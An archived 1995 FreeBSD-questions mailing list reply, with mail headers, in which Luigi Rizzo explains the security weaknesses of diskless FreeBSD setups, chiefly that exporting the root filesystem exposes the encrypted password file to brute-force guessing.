From owner-freebsd-questions  Wed Sep 20 11:34:49 1995
Return-Path: owner-questions
Received: (from root@localhost)
          by freefall.freebsd.org (8.6.12/8.6.6) id LAA22795
          for questions-outgoing; Wed, 20 Sep 1995 11:34:49 -0700
Received: from labinfo.iet.unipi.it (labinfo.iet.unipi.it [131.114.9.5])
          by freefall.freebsd.org (8.6.12/8.6.6) with ESMTP id LAA22789
          for <questions@FreeBSD.ORG>; Wed, 20 Sep 1995 11:34:43 -0700
Received: from localhost (luigi@localhost) by labinfo.iet.unipi.it (8.6.5/8.6.5) id UAA04849; Wed, 20 Sep 1995 20:38:16 +0200
From: Luigi Rizzo <luigi@labinfo.iet.unipi.it>
Message-Id: <199509201838.UAA04849@labinfo.iet.unipi.it>
Subject: Re: * The security of DISKLESS? *
To: kallio@jyu.fi (Seppo Kallio)
Date: Wed, 20 Sep 1995 20:38:15 +0200 (MET DST)
Cc: questions@FreeBSD.ORG
In-Reply-To: <v01530527ac85c710eaaf@[130.234.41.39]> from "Seppo Kallio" at Sep 20, 95 04:54:23 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1210      
Sender: owner-questions@FreeBSD.ORG
Precedence: bulk

> What kind of security holes does DISKLESS include?
> 
> Some thoughts:
> 
> 1. Can user boot the DISKLESS to sigle user and then use root provileges?

Yes, with a FreeBSD boot floppy :)

> 2. The root partition must be exported with -rootusr=root
>    - maybe it is possible to hide this dir so that user cannot
>      save suid progs and login to the server and use them?
>    - mayb ethere is nosuid in exports preventig to save suid files to
>      root partition
> 3. Other holes?

If you are referring to the answer I gave about how to setup a
diskless system, the security hole is given by the need to export
the root filesystem with root read permission. This means that you
can see the encrypted passwords (master.passwd) and possibly start
a brute-force attack to your system looking for passwords.

	Luigi
====================================================================
Luigi Rizzo                     Dip. di Ingegneria dell'Informazione
email: luigi@iet.unipi.it       Universita' di Pisa
tel: +39-50-568533              via Diotisalvi 2, 56126 PISA (Italy)
fax: +39-50-568522              http://www.iet.unipi.it/~luigi/
====================================================================